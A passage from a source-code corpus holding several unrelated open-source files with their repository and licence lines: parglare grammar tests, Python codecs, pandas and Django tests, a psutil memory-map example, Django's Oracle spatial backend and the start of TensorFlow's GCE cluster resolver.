g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('23')
assert result == '23'
def test_undefined_grammar_symbol():
"Tests that undefined grammar symbols raises errors."
grammar = """
S: A B;
A: "a" | B;
B: id;
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Unknown symbol' in str(e.value)
assert 'id' in str(e.value)
def test_multiple_terminal_definition():
grammar = """
S: A A;
terminals
A: "a";
A: "b";
"""
with pytest.raises(GrammarError,
match=r'.*Multiple definitions of terminal rule.*'):
Grammar.from_string(grammar)
def test_reserved_symbol_names():
"""
Test that reserved symbol names can't be used.
"""
grammar = """
S: STOP "First";
STOP: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
grammar = """
S: EMPTY "First";
EMPTY: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
def test_assoc_prior():
"""Test that associativity and priority can be defined for productions and
terminals.
"""
grammar = r"""
E: E '+' E {left, 1};
E: E '*' E {2, left};
E: E '^' E {right};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
# Repeat the same but for alternative keywords "shift" and "reduce"
grammar = r"""
E: E '+' E {reduce, 1};
E: E '*' E {2, reduce};
E: E '^' E {shift};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
def test_terminal_priority():
"Terminals might define priority which is used for lexical disambiguation."
grammar = """
S: A | B;
A: 'a' {15};
B: 'b';
"""
g = Grammar.from_string(grammar)
for t in g.terminals.values():
if t.name == 'A':
assert t.prior == 15
else:
assert t.prior == DEFAULT_PRIORITY
def test_no_terminal_associavitity():
"Tests that terminals can't have associativity defined."
grammar = """
S: A | B;
terminals
A: 'a' {15, left};
B: 'b';
"""
with pytest.raises(ParseError) as e:
Grammar.from_string(grammar)
assert 'Expected: : but found <NotComment(};)> or <}(})>' \
in str(e.value)
def test_terminal_empty_body():
"""
Test that terminals may have empty bodies (when defined using
recognizers)
"""
grammar = """
S: A | B;
terminals
A: {15};
B: ;
"""
g = Grammar.from_string(grammar, recognizers={'B': None, 'A': None})
a = g.get_terminal('A')
assert a.prior == 15
b = g.get_terminal('B')
assert b.recognizer is None
def test_terminal_regexp_with_backslash():
"""Regexp terminals can contain (escaped) backslash."""
grammar = Grammar.from_string(r"""
start: t1 t2;
terminals
t1: /\\/;
t2: /a/;
""")
t1 = grammar.get_terminal('t1')
assert t1.recognizer._regex == '\\\\'
assert t1.recognizer('\\', 0) == '\\'
def test_builtin_grammar_action():
"""
Builtin actions can be referenced from a grammar.
"""
grammar = """
@collect
Ones: Ones One | One;
terminals
One: "1";
"""
g = Grammar.from_string(grammar)
ones = g.get_nonterminal('Ones')
from parglare.actions import collect
assert ones.action == collect
p = Parser(g)
result = p.parse('1 1 1 1 1')
assert result == "1 1 1 1 1".split()
def test_multiple_grammar_action_raises_error():
"""
If multiple actions are given for the same non-terminal GrammarError
should be raised.
"""
grammar = """
S: Ones;
@collect
Ones: Ones One | One;
@something
Ones: 'foo';
terminals
One: "1";
"""
# Actions 'collect' and 'something' defined for rule 'Ones'
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Multiple' in str(e.value)
def test_action_override():
"""
Explicitely provided action in `actions` param overrides default or
grammar provided.
"""
grammar = """
S: Foo Bar;
@pass_nochange
Bar: "1" a;
terminals
@pass_nochange
Foo: 'foo';
a: "a";
"""
g = Grammar.from_string(grammar)
p = Parser(g)
input_str = "foo 1 a"
result = p.parse(input_str)
assert result == ["foo", ["1", "a"]]
actions = {
"Foo": lambda _, __: "eggs",
"Bar": lambda _, __: "bar reduce"}
p = Parser(g, actions=actions)
result = p.parse(input_str)
assert result == ["eggs", "bar reduce"]
# Test with actions call postponing
p = Parser(g, build_tree=True, actions=actions)
tree = p.parse(input_str)
result = p.call_actions(tree)
assert result == ["eggs", "bar reduce"]
def assignment_in_productions(prods, symbol_name, assgn_name):
found = False
for p in prods:
if p.symbol.name == symbol_name:
found = assgn_name in p.assignments
return found
def test_assignment_plain():
"""
Test plain assignment.
"""
grammar = """
S: "1" first=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == "2"
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_bool():
"""
Test bool assignment.
"""
grammar = """
S: "1" first?=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_of_repetition():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+ "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_assignment_of_repetition_with_sep():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+[comma] "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_multiple_assignment_with_repetitions():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+[comma] second?=some_match* "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
assert assignment_in_productions(g.productions, 'S', 'second')
called = [False]
def act_s(_, nodes, first, second):
called[0] = True
assert first == ["2", "2"]
assert second is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 2 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], ["2", "2", "2"], "3"]
assert called[0]
def test_case_insensitive_parsing():
"""
By default parglare is case sensitive. This test parsing without case
sensitivity.
"""
grammar = r"""
S: "one" "Two" Astart;
terminals
Astart: /Aa\w+/;
"""
g = Grammar.from_string(grammar)
# By default parsing is case sensitive for both string and regex matches.
parser = Parser(g)
with pytest.raises(ParseError):
parser.parse('One Two Aaa')
with pytest.raises(ParseError):
parser.parse('one Two AAa')
g = Grammar.from_string(grammar, ignore_case=True)
parser = Parser(g)
parser.parse('One Two Aaa')
parser.parse('one Two AAa')
| mit |
keyurpatel076/MissionPlannerGit | packages/IronPython.StdLib.2.7.4/content/Lib/encodings/utf_16_be.py | 860 | 1037 | """ Python 'utf-16-be' Codec
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
encode = codecs.utf_16_be_encode
def decode(input, errors='strict'):
return codecs.utf_16_be_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.utf_16_be_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
_buffer_decode = codecs.utf_16_be_decode
class StreamWriter(codecs.StreamWriter):
encode = codecs.utf_16_be_encode
class StreamReader(codecs.StreamReader):
decode = codecs.utf_16_be_decode
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-16-be',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
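# Example (Python 2; the codec is normally selected by its registered name):
#
#   >>> u"\u00e9".encode("utf-16-be")
#   '\x00\xe9'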
| gpl-3.0 |
DGrady/pandas | pandas/tests/computation/test_compat.py | 11 | 1308 | import pytest
from distutils.version import LooseVersion
import pandas as pd
from pandas.core.computation.engines import _engines
import pandas.core.computation.expr as expr
from pandas.core.computation import _MIN_NUMEXPR_VERSION
def test_compat():
# test we have compat with our version of numexpr
from pandas.core.computation import _NUMEXPR_INSTALLED
try:
import numexpr as ne
ver = ne.__version__
if ver < LooseVersion(_MIN_NUMEXPR_VERSION):
assert not _NUMEXPR_INSTALLED
else:
assert _NUMEXPR_INSTALLED
except ImportError:
pytest.skip("not testing numexpr version compat")
@pytest.mark.parametrize('engine', _engines)
@pytest.mark.parametrize('parser', expr._parsers)
def test_invalid_numexpr_version(engine, parser):
def testit():
a, b = 1, 2 # noqa
res = pd.eval('a + b', engine=engine, parser=parser)
assert res == 3
if engine == 'numexpr':
try:
import numexpr as ne
except ImportError:
pytest.skip("no numexpr")
else:
if ne.__version__ < LooseVersion(_MIN_NUMEXPR_VERSION):
with pytest.raises(ImportError):
testit()
else:
testit()
else:
testit()
| bsd-3-clause |
lunixbochs/fs-uae-gles | launcher/fs_uae_launcher/fsui/wx/choice.py | 1 | 1037 | from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import wx
from .common import update_class
class Choice(wx.Choice):
def __init__(self, parent, items=[]):
wx.Choice.__init__(self, parent.get_container(), -1,
wx.DefaultPosition, wx.DefaultSize, items)
if len(items) > 0:
self.SetSelection(0)
self.Bind(wx.EVT_CHOICE, self.__choice_event)
def get_min_width(self):
return self.GetBestSize()[0]
def get_min_height(self):
return self.GetBestSize()[1]
def set_position(self, position):
self.SetPosition(position)
def set_size(self, size):
self.SetSize(size)
def get_index(self):
return self.GetSelection()
def set_index(self, index):
self.SetSelection(index)
def on_change(self):
print("Choice.on_change")
def __choice_event(self, event):
self.on_change()
update_class(Choice)
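# Typical use (a sketch; "parent" is any fsui container widget):
#
#   class DriveChoice(Choice):
#       def on_change(self):
#           print("selected index %d" % self.get_index())
#
#   choice = DriveChoice(parent, ["ADF", "HDF"])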
| gpl-2.0 |
YuanYouYuan/FreeCAD | src/Tools/MakeAppTools.py | 32 | 2611 | import os, sys, re, string, FCFileTools
verbose = 0
dcount = fcount = 0
def replaceTemplate(dirName, oldName, newName):
"""
modify contents from dirName and below, replace oldName by newName
"""
for file in os.listdir(dirName):
pathName = os.path.join(dirName, file)
if not os.path.isdir(pathName):
try:
print pathName
origFile = open(pathName) # open file
lines = origFile.readlines() # read the file...
origFile.close() # ... and close it
output = open(pathName,"w") # open the file again
for line in lines:
if (string.find(line, oldName) != -1): # search for 'oldName' and replace it
line = string.replace(line, oldName, newName)
output.write(line) # write the modified line back
                output.close()  # close the file
except:
print 'Error modifying', pathName, '--skipped'
print sys.exc_type, sys.exc_value
else:
try:
replaceTemplate(pathName, oldName, newName)
except:
print 'Error changing to directory', pathName, '--skipped'
print sys.exc_type, sys.exc_value
def copyTemplate(dirFrom, dirTo, oldName, newName, MatchFile, MatchDir):
"""
copy contents of dirFrom and below to dirTo
"""
global dcount, fcount
for file in os.listdir(dirFrom): # for files/dirs here
print file
pathFrom = os.path.join(dirFrom, file)
pathTo = os.path.join(dirTo, file) # extend both paths
if (string.find(pathTo, oldName) != -1):
pathTo = string.replace(pathTo, oldName, newName) # rename file if 'oldName' is found
if not os.path.isdir(pathFrom): # copy simple files
hit = 0
for matchpat in MatchFile:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore file '+file
continue
try:
if verbose > 1: print 'copying', pathFrom, 'to', pathTo
FCFileTools.cpfile(pathFrom, pathTo)
fcount = fcount+1
except:
print 'Error copying', pathFrom, 'to', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
else:
hit = 0
for matchpat in MatchDir:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore directory '+file
continue
if verbose: print 'copying dir', pathFrom, 'to', pathTo
try:
os.mkdir(pathTo) # make new subdir
copyTemplate(pathFrom, pathTo, oldName, newName, MatchFile, MatchDir) # recur into subdirs
dcount = dcount+1
except:
print 'Error creating', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
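# Example (hypothetical names and patterns): copy an app template, renaming
# every "_TEMPLATE_" occurrence and skipping backup files and CVS folders:
#
#   copyTemplate("App_TEMPLATE_", "AppMyApp", "_TEMPLATE_", "MyApp",
#                [r".*\.bak$"], [r"^CVS$"])
#   replaceTemplate("AppMyApp", "_TEMPLATE_", "MyApp")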
| lgpl-2.1 |
synasius/django | tests/null_queries/tests.py | 36 | 2939 | from __future__ import unicode_literals
from django.core.exceptions import FieldError
from django.test import TestCase
from .models import Choice, Inner, OuterA, OuterB, Poll
class NullQueriesTests(TestCase):
def test_none_as_null(self):
"""
Regression test for the use of None as a query value.
None is interpreted as an SQL NULL, but only in __exact and __iexact
queries.
Set up some initial polls and choices
"""
p1 = Poll(question='Why?')
p1.save()
c1 = Choice(poll=p1, choice='Because.')
c1.save()
c2 = Choice(poll=p1, choice='Why Not?')
c2.save()
# Exact query with value None returns nothing ("is NULL" in sql,
# but every 'id' field has a value).
self.assertQuerysetEqual(Choice.objects.filter(choice__exact=None), [])
# The same behavior for iexact query.
self.assertQuerysetEqual(Choice.objects.filter(choice__iexact=None), [])
# Excluding the previous result returns everything.
self.assertQuerysetEqual(
Choice.objects.exclude(choice=None).order_by('id'),
[
'<Choice: Choice: Because. in poll Q: Why? >',
'<Choice: Choice: Why Not? in poll Q: Why? >'
]
)
# Valid query, but fails because foo isn't a keyword
self.assertRaises(FieldError, Choice.objects.filter, foo__exact=None)
# Can't use None on anything other than __exact and __iexact
self.assertRaises(ValueError, Choice.objects.filter, id__gt=None)
# Related managers use __exact=None implicitly if the object hasn't been saved.
p2 = Poll(question="How?")
self.assertEqual(repr(p2.choice_set.all()), '<QuerySet []>')
def test_reverse_relations(self):
"""
Querying across reverse relations and then another relation should
insert outer joins correctly so as not to exclude results.
"""
obj = OuterA.objects.create()
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third=None),
['<OuterA: OuterA object>']
)
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third__data=None),
['<OuterA: OuterA object>']
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
Inner.objects.filter(first__inner__third=None),
['<Inner: Inner object>']
)
# Ticket #13815: check if <reverse>_isnull=False does not produce
# faulty empty lists
OuterB.objects.create(data="reverse")
self.assertQuerysetEqual(
OuterB.objects.filter(inner__isnull=False),
[]
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
OuterB.objects.exclude(inner__isnull=False),
['<OuterB: OuterB object>']
)
| bsd-3-clause |
chen0031/Dato-Core | src/unity/python_deps/psutil/examples/pmap.py | 43 | 1983 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A clone of the 'pmap' utility on Linux, 'vmmap' on OSX, and 'procstat -v' on BSD.
Report memory map of a process.
$ python examples/pmap.py 32402
pid=32402, name=hg
Address RSS Mode Mapping
0000000000400000 1200K r-xp /usr/bin/python2.7
0000000000838000 4K r--p /usr/bin/python2.7
0000000000839000 304K rw-p /usr/bin/python2.7
00000000008ae000 68K rw-p [anon]
000000000275e000 5396K rw-p [heap]
00002b29bb1e0000 124K r-xp /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb203000 8K rw-p [anon]
00002b29bb220000 528K rw-p [anon]
00002b29bb2d8000 768K rw-p [anon]
00002b29bb402000 4K r--p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb403000 8K rw-p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb405000 60K r-xp /lib/x86_64-linux-gnu/libpthread-2.17.so
00002b29bb41d000 0K ---p /lib/x86_64-linux-gnu/libpthread-2.17.so
00007fff94be6000 48K rw-p [stack]
00007fff94dd1000 4K r-xp [vdso]
ffffffffff600000 0K r-xp [vsyscall]
...
"""
import sys
import psutil
from psutil._compat import print_
def main():
if len(sys.argv) != 2:
sys.exit('usage: pmap <pid>')
p = psutil.Process(int(sys.argv[1]))
print_("pid=%s, name=%s" % (p.pid, p.name()))
templ = "%-16s %10s %-7s %s"
print_(templ % ("Address", "RSS", "Mode", "Mapping"))
total_rss = 0
for m in p.memory_maps(grouped=False):
total_rss += m.rss
print_(templ % (
m.addr.split('-')[0].zfill(16),
str(m.rss / 1024) + 'K',
m.perms,
m.path))
print_("-" * 33)
print_(templ % ("Total", str(total_rss / 1024) + 'K', '', ''))
if __name__ == '__main__':
main()
| agpl-3.0 |
wuga214/Django-Wuga | env/lib/python2.7/site-packages/django/contrib/gis/db/backends/oracle/operations.py | 18 | 10848 | """
This module contains the spatial lookup types, and the `get_geo_where_clause`
routine for Oracle Spatial.
Please note that WKT support is broken on the XE version, and thus
this backend will not work on such platforms. Specifically, XE lacks
support for an internal JVM, and Java libraries are required to use
the WKT constructors.
"""
import re
from django.contrib.gis.db.backends.base.operations import \
BaseSpatialOperations
from django.contrib.gis.db.backends.oracle.adapter import OracleSpatialAdapter
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.db.models import aggregates
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.db.backends.oracle.operations import DatabaseOperations
from django.utils import six
from django.utils.functional import cached_property
DEFAULT_TOLERANCE = '0.05'
class SDOOperator(SpatialOperator):
sql_template = "%(func)s(%(lhs)s, %(rhs)s) = 'TRUE'"
class SDODistance(SpatialOperator):
sql_template = "SDO_GEOM.SDO_DISTANCE(%%(lhs)s, %%(rhs)s, %s) %%(op)s %%(value)s" % DEFAULT_TOLERANCE
class SDODWithin(SpatialOperator):
sql_template = "SDO_WITHIN_DISTANCE(%(lhs)s, %(rhs)s, %%s) = 'TRUE'"
class SDODisjoint(SpatialOperator):
sql_template = "SDO_GEOM.RELATE(%%(lhs)s, 'DISJOINT', %%(rhs)s, %s) = 'DISJOINT'" % DEFAULT_TOLERANCE
class SDORelate(SpatialOperator):
sql_template = "SDO_RELATE(%(lhs)s, %(rhs)s, 'mask=%(mask)s') = 'TRUE'"
def check_relate_argument(self, arg):
masks = 'TOUCH|OVERLAPBDYDISJOINT|OVERLAPBDYINTERSECT|EQUAL|INSIDE|COVEREDBY|CONTAINS|COVERS|ANYINTERACT|ON'
mask_regex = re.compile(r'^(%s)(\+(%s))*$' % (masks, masks), re.I)
if not isinstance(arg, six.string_types) or not mask_regex.match(arg):
raise ValueError('Invalid SDO_RELATE mask: "%s"' % arg)
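# Illustrative sketch (hypothetical arguments): check_relate_argument passes
# for 'INSIDE+TOUCH' or 'anyinteract' (matching is case-insensitive), while a
# string such as 'NEAR' raises ValueError('Invalid SDO_RELATE mask: "NEAR"').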
def as_sql(self, connection, lookup, template_params, sql_params):
template_params['mask'] = sql_params.pop()
return super(SDORelate, self).as_sql(connection, lookup, template_params, sql_params)
class SDOIsValid(SpatialOperator):
sql_template = "%%(func)s(%%(lhs)s, %s) = 'TRUE'" % DEFAULT_TOLERANCE
class OracleOperations(BaseSpatialOperations, DatabaseOperations):
name = 'oracle'
oracle = True
disallowed_aggregates = (aggregates.Collect, aggregates.Extent3D, aggregates.MakeLine)
Adapter = OracleSpatialAdapter
area = 'SDO_GEOM.SDO_AREA'
gml = 'SDO_UTIL.TO_GMLGEOMETRY'
centroid = 'SDO_GEOM.SDO_CENTROID'
difference = 'SDO_GEOM.SDO_DIFFERENCE'
distance = 'SDO_GEOM.SDO_DISTANCE'
extent = 'SDO_AGGR_MBR'
intersection = 'SDO_GEOM.SDO_INTERSECTION'
length = 'SDO_GEOM.SDO_LENGTH'
num_points = 'SDO_UTIL.GETNUMVERTICES'
perimeter = length
point_on_surface = 'SDO_GEOM.SDO_POINTONSURFACE'
reverse = 'SDO_UTIL.REVERSE_LINESTRING'
sym_difference = 'SDO_GEOM.SDO_XOR'
transform = 'SDO_CS.TRANSFORM'
union = 'SDO_GEOM.SDO_UNION'
unionagg = 'SDO_AGGR_UNION'
from_text = 'SDO_GEOMETRY'
function_names = {
'Area': 'SDO_GEOM.SDO_AREA',
'BoundingCircle': 'SDO_GEOM.SDO_MBC',
'Centroid': 'SDO_GEOM.SDO_CENTROID',
'Difference': 'SDO_GEOM.SDO_DIFFERENCE',
'Distance': 'SDO_GEOM.SDO_DISTANCE',
'Intersection': 'SDO_GEOM.SDO_INTERSECTION',
'IsValid': 'SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT',
'Length': 'SDO_GEOM.SDO_LENGTH',
'NumGeometries': 'SDO_UTIL.GETNUMELEM',
'NumPoints': 'SDO_UTIL.GETNUMVERTICES',
'Perimeter': 'SDO_GEOM.SDO_LENGTH',
'PointOnSurface': 'SDO_GEOM.SDO_POINTONSURFACE',
'Reverse': 'SDO_UTIL.REVERSE_LINESTRING',
'SymDifference': 'SDO_GEOM.SDO_XOR',
'Transform': 'SDO_CS.TRANSFORM',
'Union': 'SDO_GEOM.SDO_UNION',
}
# We want to get SDO Geometries as WKT because it is much easier to
# instantiate GEOS proxies from WKT than SDO_GEOMETRY(...) strings.
# However, this adversely affects performance (i.e., Java is called
# to convert to WKT on every query). If someone wishes to write a
# SDO_GEOMETRY(...) parser in Python, let me know =)
select = 'SDO_UTIL.TO_WKTGEOMETRY(%s)'
gis_operators = {
'contains': SDOOperator(func='SDO_CONTAINS'),
'coveredby': SDOOperator(func='SDO_COVEREDBY'),
'covers': SDOOperator(func='SDO_COVERS'),
'disjoint': SDODisjoint(),
'intersects': SDOOperator(func='SDO_OVERLAPBDYINTERSECT'), # TODO: Is this really the same as ST_Intersects()?
'isvalid': SDOIsValid(func='SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT'),
'equals': SDOOperator(func='SDO_EQUAL'),
'exact': SDOOperator(func='SDO_EQUAL'),
'overlaps': SDOOperator(func='SDO_OVERLAPS'),
'same_as': SDOOperator(func='SDO_EQUAL'),
'relate': SDORelate(), # Oracle uses a different syntax, e.g., 'mask=inside+touch'
'touches': SDOOperator(func='SDO_TOUCH'),
'within': SDOOperator(func='SDO_INSIDE'),
'distance_gt': SDODistance(op='>'),
'distance_gte': SDODistance(op='>='),
'distance_lt': SDODistance(op='<'),
'distance_lte': SDODistance(op='<='),
'dwithin': SDODWithin(),
}
truncate_params = {'relate': None}
@cached_property
def unsupported_functions(self):
unsupported = {
'AsGeoJSON', 'AsKML', 'AsSVG', 'Envelope', 'ForceRHR', 'GeoHash',
'MakeValid', 'MemSize', 'Scale', 'SnapToGrid', 'Translate',
}
if self.connection.oracle_full_version < '12.1.0.2':
unsupported.add('BoundingCircle')
return unsupported
def geo_quote_name(self, name):
return super(OracleOperations, self).geo_quote_name(name).upper()
def get_db_converters(self, expression):
converters = super(OracleOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
geometry_fields = (
'PointField', 'GeometryField', 'LineStringField',
'PolygonField', 'MultiPointField', 'MultiLineStringField',
'MultiPolygonField', 'GeometryCollectionField', 'GeomField',
'GMLField',
)
if internal_type in geometry_fields:
converters.append(self.convert_textfield_value)
if hasattr(expression.output_field, 'geom_type'):
converters.append(self.convert_geometry)
return converters
def convert_geometry(self, value, expression, connection, context):
if value:
value = Geometry(value)
if 'transformed_srid' in context:
value.srid = context['transformed_srid']
return value
def convert_extent(self, clob, srid):
if clob:
# Generally, Oracle returns a polygon for the extent -- however,
# it can return a single point if there's only one Point in the
# table.
ext_geom = Geometry(clob.read(), srid)
gtype = str(ext_geom.geom_type)
if gtype == 'Polygon':
# Construct the 4-tuple from the coordinates in the polygon.
shell = ext_geom.shell
ll, ur = shell[0][:2], shell[2][:2]
elif gtype == 'Point':
ll = ext_geom.coords[:2]
ur = ll
else:
raise Exception('Unexpected geometry type returned for extent: %s' % gtype)
xmin, ymin = ll
xmax, ymax = ur
return (xmin, ymin, xmax, ymax)
else:
return None
def geo_db_type(self, f):
"""
Returns the geometry database type for Oracle. Unlike other spatial
backends, no stored procedure is necessary and it's the same for all
geometry types.
"""
return 'MDSYS.SDO_GEOMETRY'
def get_distance(self, f, value, lookup_type, **kwargs):
"""
Returns the distance parameters given the value and the lookup type.
On Oracle, geometry columns with a geodetic coordinate system behave
implicitly like a geography column, and thus meters will be used as
the distance parameter on them.
"""
if not value:
return []
value = value[0]
if isinstance(value, Distance):
if f.geodetic(self.connection):
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
dist_param = value
# dwithin lookups on Oracle require a special string parameter
# that starts with "distance=".
if lookup_type == 'dwithin':
dist_param = 'distance=%s' % dist_param
return [dist_param]
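# Illustrative sketch (hypothetical lookup values): for a 'dwithin' lookup
# with Distance(m=25) on a geodetic field this returns ['distance=25.0'],
# which fills the trailing %s in SDODWithin.sql_template; a 'distance_lte'
# lookup would instead return the bare numeric value, e.g. [25.0].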
def get_geom_placeholder(self, f, value, compiler):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
SDO_CS.TRANSFORM() function call.
"""
if value is None:
return 'NULL'
def transform_value(val, srid):
return val.srid != srid
if hasattr(value, 'as_sql'):
if transform_value(value, f.srid):
placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
else:
placeholder = '%s'
# No geometry value used for F expression, substitute in
# the column name instead.
sql, _ = compiler.compile(value)
return placeholder % sql
else:
if transform_value(value, f.srid):
return '%s(SDO_GEOMETRY(%%s, %s), %s)' % (self.transform, value.srid, f.srid)
else:
return 'SDO_GEOMETRY(%%s, %s)' % f.srid
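# Illustrative sketch (hypothetical SRIDs): for a plain geometry value with
# srid=4326 on a field with srid=3857 this returns
# 'SDO_CS.TRANSFORM(SDO_GEOMETRY(%s, 4326), 3857)'; when the SRIDs already
# match, it is simply 'SDO_GEOMETRY(%s, 3857)'.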
def spatial_aggregate_name(self, agg_name):
"""
Returns the spatial aggregate SQL name.
"""
agg_name = 'unionagg' if agg_name.lower() == 'union' else agg_name.lower()
return getattr(self, agg_name)
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
from django.contrib.gis.db.backends.oracle.models import OracleGeometryColumns
return OracleGeometryColumns
def spatial_ref_sys(self):
from django.contrib.gis.db.backends.oracle.models import OracleSpatialRefSys
return OracleSpatialRefSys
def modify_insert_params(self, placeholder, params):
"""Drop out insert parameters for NULL placeholder. Needed for Oracle Spatial
backend due to #10888.
"""
if placeholder == 'NULL':
return []
return super(OracleOperations, self).modify_insert_params(placeholder, params)
| apache-2.0 |
lukeiwanski/tensorflow | tensorflow/contrib/cluster_resolver/python/training/gce_cluster_resolver.py | 24 | 5151 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of Cluster Resolvers for GCE Instance Groups."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cluster_resolver.python.training.cluster_resolver import ClusterResolver
from tensorflow.python.training.server_lib import ClusterSpec
_GOOGLE_API_CLIENT_INSTALLED = True
try:
from googleapiclient import discovery # pylint: disable=g-import-not-at-top
from oauth2client.client import GoogleCredentials # pylint: disable=g-import-not-at-top
except ImportError:
_GOOGLE_API_CLIENT_INSTALLED = False
class GceClusterResolver(ClusterResolver):
"""Cluster Resolver for Google Compute Engine.
This is an implementation of cluster resolvers for the Google Compute Engine
instance group platform. By specifying a project, zone, and instance group,
this will retrieve the IP address of all the instances within the instance
group and return a Cluster Resolver object suitable for use for distributed
TensorFlow.
"""
def __init__(self,
project,
zone,
instance_group,
port,
job_name='worker',
credentials='default',
service=None):
"""Creates a new GceClusterResolver object.
This takes in a few parameters and creates a GceClusterResolver project. It
will then use these parameters to query the GCE API for the IP addresses of
each instance in the instance group.
Args:
project: Name of the GCE project
zone: Zone of the GCE instance group
instance_group: Name of the GCE instance group
port: Port of the listening TensorFlow server (default: 8470)
job_name: Name of the TensorFlow job this set of instances belongs to
credentials: GCE Credentials. If nothing is specified, this defaults to
GoogleCredentials.get_application_default()
service: The GCE API object returned by the googleapiclient.discovery
function. (Default: discovery.build('compute', 'v1')). If you specify a
custom service object, then the credentials parameter will be ignored.
Raises:
ImportError: If the googleapiclient is not installed.
"""
self._project = project
self._zone = zone
self._instance_group = instance_group
self._job_name = job_name
self._port = port
self._credentials = credentials
if credentials == 'default':
if _GOOGLE_API_CLIENT_INSTALLED:
self._credentials = GoogleCredentials.get_application_default()
if service is None:
if not _GOOGLE_API_CLIENT_INSTALLED:
raise ImportError('googleapiclient must be installed before using the '
'GCE cluster resolver')
self._service = discovery.build(
'compute', 'v1',
credentials=self._credentials)
else:
self._service = service
def cluster_spec(self):
"""Returns a ClusterSpec object based on the latest instance group info.
This returns a ClusterSpec object for use based on information from the
